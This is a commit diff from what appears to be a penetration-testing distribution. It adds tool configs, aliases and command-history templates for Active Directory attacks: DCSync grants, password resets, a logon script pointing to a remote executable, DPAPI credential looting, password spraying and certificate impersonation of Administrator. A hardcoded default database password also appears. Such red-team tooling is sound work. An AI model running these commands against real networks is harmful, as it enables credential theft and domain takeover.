-
-
Notifications
You must be signed in to change notification settings - Fork 69
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #331 from ThePorgs/dev
Release 3.1.3
- Loading branch information
Showing
59 changed files
with
767 additions
and
343 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
{ | ||
"version": 1, | ||
"bind_addr": "localhost:1030", | ||
"metrics_port": ":2112", | ||
"root_url": "http://localhost:1030/", | ||
"work_dir": "/opt/tools/BloodHound-CE/work", | ||
"log_level": "INFO", | ||
"log_path": "bloodhound.log", | ||
"features": { | ||
"enable_auth": true | ||
}, | ||
"tls": { | ||
"cert_file": "", | ||
"key_file": "" | ||
}, | ||
"database": { | ||
"connection": "user=bloodhound password=exegol4thewin dbname=bloodhound host=localhost" | ||
}, | ||
"neo4j": { | ||
"connection": "neo4j://neo4j:exegol4thewin@localhost:7687/" | ||
}, | ||
"collectors_base_path": "/opt/tools/BloodHound-CE/collectors" | ||
} |
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,12 @@ | ||
[exegol_provider] | ||
default = default_sect | ||
legacy = legacy_sect | ||
|
||
[openssl_init] | ||
providers = exegol_provider | ||
|
||
[default_sect] | ||
activate = 1 | ||
|
||
[legacy_sect] | ||
activate = 1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
# most common dependencies, found with the following commands | ||
# 1. for pipx: | ||
# find ~/.local/share/pipx/ -type d -name "bin" 2>/dev/null | while read venv_path; do venv_bin="${venv_path}/python"; if [[ -x "$venv_bin" ]]; then suffix=$(printf "%04d" $((suffix+1))); "$venv_bin" -m pip list > "/tmp/pipxlibs${suffix}.txt"; fi; done | ||
# 2. for /opt/tools: | ||
# find /opt/tools ~/.local/share/pipx/ -type d -name "venv" 2>/dev/null | while read venv_path; do venv_bin="${venv_path}/bin/python"; if [[ -x "$venv_bin" ]]; then suffix=$(printf "%04d" $((suffix+1))); "$venv_bin" -m pip list > "/tmp/piplibs${suffix}.txt"; fi; done | ||
# 3. compare | ||
# awk 'FNR > 2 {print $1}' /tmp/piplibs*.txt /tmp/pipxlibs*.txt | sort | uniq -c | sort -nr | ||
|
||
# The impacket package cannot be added here as it will conflict with install_impacket | ||
|
||
setuptools | ||
pip | ||
charset-normalizer | ||
six | ||
certifi | ||
idna | ||
urllib3 | ||
requests | ||
pycparser | ||
cffi | ||
click | ||
cryptography | ||
MarkupSafe | ||
Jinja2 | ||
pyasn1 | ||
dnspython | ||
Werkzeug | ||
pyOpenSSL | ||
itsdangerous | ||
Flask | ||
pycryptodomex | ||
ldap3 | ||
blinker | ||
future | ||
ldapdomaindump | ||
pandas |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,2 +1,2 @@ | ||
alias BurpSuiteCommunity='java -jar -Xmx4g /opt/tools/BurpSuiteCommunity/BurpSuiteCommunity.jar' | ||
alias BurpSuiteCommunity='/usr/lib/jvm/java-21-openjdk/bin/java -jar -Xmx4g /opt/tools/BurpSuiteCommunity/BurpSuiteCommunity.jar' | ||
alias burpsuite=BurpSuiteCommunity |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
alias evil-winrm='/usr/local/rvm/gems/ruby-3.2.2@evil-winrm/wrappers/ruby /usr/local/rvm/gems/ruby-3.2.2@evil-winrm/bin/evil-winrm' | ||
alias evil-winrm='/usr/local/rvm/gems/ruby-3.1.2@evil-winrm/wrappers/ruby /usr/local/rvm/gems/ruby-3.1.2@evil-winrm/bin/evil-winrm' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
alias ExtractBitlockerKeys.py="/opt/tools/ExtractBitlockerKeys/venv/bin/python3 /opt/tools/ExtractBitlockerKeys/ExtractBitlockerKeys.py" | ||
alias ExtractBitlockerKeys.py="/opt/tools/ExtractBitlockerKeys/venv/bin/python3 /opt/tools/ExtractBitlockerKeys/python/ExtractBitlockerKeys.py" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
alias sccmhunter.py='/opt/tools/sccmhunter/venv/bin/python3 /opt/tools/sccmhunter/sccmhunter.py' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
alias sccmwtf.py='/opt/tools/sccmwtf/venv/bin/python3 /opt/tools/sccmwtf/sccmwtf.py' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
alias ysoserial='JAVA_HOME=/usr/lib/jvm/java-11-openjdk java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens=java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED -jar /opt/tools/ysoserial/ysoserial.jar' | ||
alias ysoserial='/usr/lib/jvm/java-11-openjdk/bin/java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens=java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED -jar /opt/tools/ysoserial/ysoserial.jar' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,4 +1,4 @@ | ||
abuseACL "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" | ||
abuseACL -hashes "$USER_NTHASH" -extends "$DOMAIN"/"$USER" | ||
abuseACL -hashes "$NT_HASH" -extends "$DOMAIN"/"$USER" | ||
abuseACL -k -principal "$PRINCIPAL" -extends "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" | ||
abuseACL -principalsfile ./principalsfile "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,16 @@ | ||
bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP set object $COMPUTER_NAME serviceprincipalname | ||
bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP set object $COMPUTER_NAME dnsHostName -v '$DC_NAME.$DOMAIN' | ||
bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP get object $COMPUTER_NAME --attr dnsHostName,serviceprincipalname | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object vulnerable_user msTSInitialProgram -v '\\1.2.3.4\share\file.exe' | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object vulnerable_user msTSWorkDirectory -v 'C:\' | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object vulnerable_user scriptPath -v '\\1.2.3.4\share\file.exe' | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set owner $TargetObject $ControlledPrincipal | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get dnsDump | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add groupMember $TargetGroup $TargetUser | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object 'RODC-server$' --attr msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local' -v 'CN=Administrator,CN=Users,DC=domain,DC=local' | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object 'RODC-server$' --attr msDS-NeverRevealGroup | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password $TargetUser $NewPassword | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add genericAll $TargetObject $ControlledPrincipal | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add dcsync $ControlledPrincipal | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get object $TargetObject --attr msDS-ManagedPassword |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,4 +1,4 @@ | ||
certipy find -enabled -u "$USER@$DOMAIN" -p "$PASSWORD" -old-bloodhound | ||
certipy req -username "$USER@$DOMAIN" -p "$PASSWORD" -ca "$CA_NAME" -target "$CA_FQDN" -template "$ESC1_TEMPLATE_NAME" -upn "Administrator@$DOMAIN" | ||
certipy req -username "$USER@$DOMAIN" -hashes "$USER_NTHASH" -ca "$CA_NAME" -target "$CA_FQDN" -template "$ESC1_TEMPLATE_NAME" -upn "Administrator@$DOMAIN" | ||
certipy req -username "$USER@$DOMAIN" -hashes "$NT_HASH" -ca "$CA_NAME" -target "$CA_FQDN" -template "$ESC1_TEMPLATE_NAME" -upn "Administrator@$DOMAIN" | ||
certipy relay -ca "$CA_FQDN" -template "$ESC8_TEMPLATE_NAME" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
dploot machinecertificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -quiet | ||
dploot backupkey -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -quiet | ||
dploot certificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk -quiet | ||
dploot browser -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile /data/masterkeys | ||
dploot masterkeys -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk | ||
dploot masterkeys -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -passwords passwords | ||
dploot credentials -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf | ||
dploot credentials -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk | ||
dploot vaults -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf | ||
dploot vaults -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk | ||
dploot rdg -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf | ||
dploot rdg -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk | ||
dploot certificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf | ||
dploot certificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk | ||
dploot browser -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf | ||
dploot browser -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk | ||
dploot machinemasterkeys -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" | ||
dploot machinecredentials -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" | ||
dploot machinevaults -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" | ||
dploot machinecertificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" | ||
dploot wifi -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" | ||
dploot sccm -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" | ||
dploot backupkey -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" | ||
dploot mobaxterm -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,3 +1,5 @@ | ||
kerbrute userenum -d "$DOMAIN" usernames.txt | ||
kerbrute passwordspray -d "$DOMAIN" domain_users.txt Password123 | ||
kerbrute bruteuser -d "$DOMAIN" passwords.lst thoffman | ||
kerbrute userenum --domain "$DOMAIN" usernames.txt | ||
kerbrute passwordspray --domain "$DOMAIN" domain_users.txt Password123 | ||
kerbrute passwordspray --user-as-pass --domain "$DOMAIN" domain_users.txt | ||
kerbrute bruteuser --domain "$DOMAIN" passwords.lst thoffman | ||
kerbrute bruteforce --domain "$DOMAIN" user_password.lst |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
pretender -i "$INTERFACE" --dry | ||
pretender -i "$INTERFACE" --dry --no-ra | ||
pretender -i "$INTERFACE" --dry --no-ra-dns | ||
pretender -i "$INTERFACE" --spoof "$DOMAIN" | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,10 @@ | ||
sccmhunter.py admin -u "$USER" -p "$PASSWORD" -ip "$TARGET" | ||
sccmhunter.py find -u "$USER" -p "$PASSWORD" -d "$DOMAIN" -dc-ip "$DC_IP" | ||
sccmhunter.py smb -u "$USER" -p "$PASSWORD" -d "$DOMAIN" -dc-ip "$DC_IP" -save | ||
sccmhunter.py http -u "$USER" -p "$PASSWORD" -d "$DOMAIN" -dc-ip "$DC_IP" -auto | ||
sccmhunter.py http -u "$USER" -p "$PASSWORD" -d "$DOMAIN" -cn "$COMPUTER_NAME" -cp "$COMPUTER_PASSWORD" -dc-ip "$DC_IP" | ||
sccmhunter.py admin -u "$USERNAME" -p ":$NT_HASH" -ip "$TARGET" | ||
sccmhunter.py show -smb | ||
sccmhunter.py show -user | ||
sccmhunter.py show -computers | ||
sccmhunter.py show -all |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
sccmwtf.py fakepc "fakepc.$DOMAIN" "$SCCM_MP_NetBiosName" "$DOMAIN\controlledComputer$" "controlledPassword" |
Oops, something went wrong.